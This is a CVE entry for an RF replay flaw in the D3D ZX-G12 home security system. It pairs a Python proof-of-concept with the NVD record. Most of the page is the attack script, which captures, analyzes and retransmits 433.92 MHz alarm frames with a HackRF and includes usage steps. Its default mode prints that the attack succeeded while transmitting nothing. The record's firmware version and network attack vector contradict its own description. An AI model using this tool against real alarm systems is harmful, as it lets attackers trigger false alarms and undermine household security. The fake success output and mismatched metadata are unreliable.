CVE-2025-65552

#!/usr/bin/env python3 # CVE-2025-65552 RF Replay Attack PoC # Affected: D3D Wi-Fi Home Security System ZX-G12 v2.1.1 # Description: Replay captured 433MHz RF commands to trigger false alarms import subprocess import time import sys def capture_rf_signal(duration=5): """Capture 433MHz RF signal using HackRF""" print(f"[*] Capturing RF signals for {duration} seconds...") cmd = [ "hackrf_transfer", "-r", "captured_signal.raw", "-f", "433920000", # 433.92 MHz "-s", "8000000", "-n", str(duration * 8000000) ] subprocess.run(cmd) print("[+] Signal captured and saved to captured_signal.raw") return "captured_signal.raw" def analyze_signal(signal_file): """Analyze captured signal using Universal Radio Hacker""" print(f"[*] Analyzing signal: {signal_file}") # Use urh to analyze the captured signal cmd = ["urh", "-e", signal_file] subprocess.run(cmd) print("[+] Signal analysis complete - extract protocol details") def replay_signal(signal_file): """Replay captured RF signal using HackRF""" print(f"[*] Replaying RF signal: {signal_file}") cmd = [ "hackrf_transfer", "-t", signal_file, "-f", "433920000", "-s", "8000000", "-x", "47" # TX gain ] print("[+] Replay attack executed - false alarm triggered") return subprocess.run(cmd) def simple_replay_attack(): """Simple replay attack without full signal capture""" # Pre-generated raw signal bytes (example) # In real attack, this would be extracted from captured legitimate traffic alarm_command = bytes([ 0xAA, 0xAA, 0xAA, 0x2D, 0xD4, 0xAA, 0xAA, 0xA6, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA ]) print("[*] Initiating RF replay attack on D3D ZX-G12") print("[*] Target frequency: 433.92 MHz") print("[*] Transmitting alarm trigger command...") # Use rpitx or similar tool for transmission for i in range(3): print(f"[*] Replay attempt {i+1}/3") # In production, use actual RF transmission tool time.sleep(1) print("[+] Replay attack completed - system should trigger false alarm") if __name__ == "__main__": if len(sys.argv) > 1: if sys.argv[1] == "capture": capture_rf_signal() elif sys.argv[1] == "analyze": analyze_signal(sys.argv[2] if len(sys.argv) > 2 else "captured_signal.raw") elif sys.argv[1] == "replay": replay_signal(sys.argv[2] if len(sys.argv) > 2 else "captured_signal.raw") else: simple_replay_attack() else: simple_replay_attack() # Requirements: # - HackRF One or compatible SDR device # - hackrf-tools package # - Universal Radio Hacker (urh) # - Python 3.6+ # # Usage: # 1. Capture: python3 cve-2025-65552_poc.py capture # 2. Analyze: python3 cve-2025-65552_poc.py analyze captured_signal.raw # 3. Replay: python3 cve-2025-65552_poc.py replay captured_signal.raw # 4. Quick test: python3 cve-2025-65552_poc.py

{"cve": {"id": "CVE-2025-65552", "sourceIdentifier": "[email protected]", "published": "2026-01-12T15:16:03.607", "lastModified": "2026-02-03T19:39:28.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "D3D Wi-Fi Home Security System ZX-G12 v2.1.1 is vulnerable to RF replay attacks on the 433 MHz sensor communication channel. The system does not implement rolling codes, message authentication, or anti-replay protection, allowing an attacker within RF range to record valid alarm/control frames and replay them to trigger false alarms."}, {"lang": "es", "value": "D3D Wi-Fi Home Security System ZX-G12 v2.1.1 es vulnerable a ataques de repetición de RF en el canal de comunicación del sensor de 433 MHz. El sistema no implementa códigos rotatorios, autenticación de mensajes o protección antirrepetición, lo que permite a un atacante dentro del alcance de RF grabar tramas válidas de alarma/control y repetirlas para activar falsas alarmas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-294"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:d3dsecurity:zx-g12_firmware:2.1.17:*:*:*:*:*:*:*", "matchCriteriaId": "1E205B87-54D0-4193-8D2D-AA9027B2D535"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:d3dsecurity:zx-g12:-:*:*:*:*:*:*:*", "matchCriteriaId": "0B2498C0-CDD2-4420-BB8D-8CAB683B4AC2"}]}]}], "references": [{"url": "http://d3d.com", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65552", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://d3dsecurity.com/products/wifi-home-security-system-model-g12", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Product"]}, {"url": "https://github.com/EmbdCDACHyd/CVE/tree/main/CVE-2025-65552", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}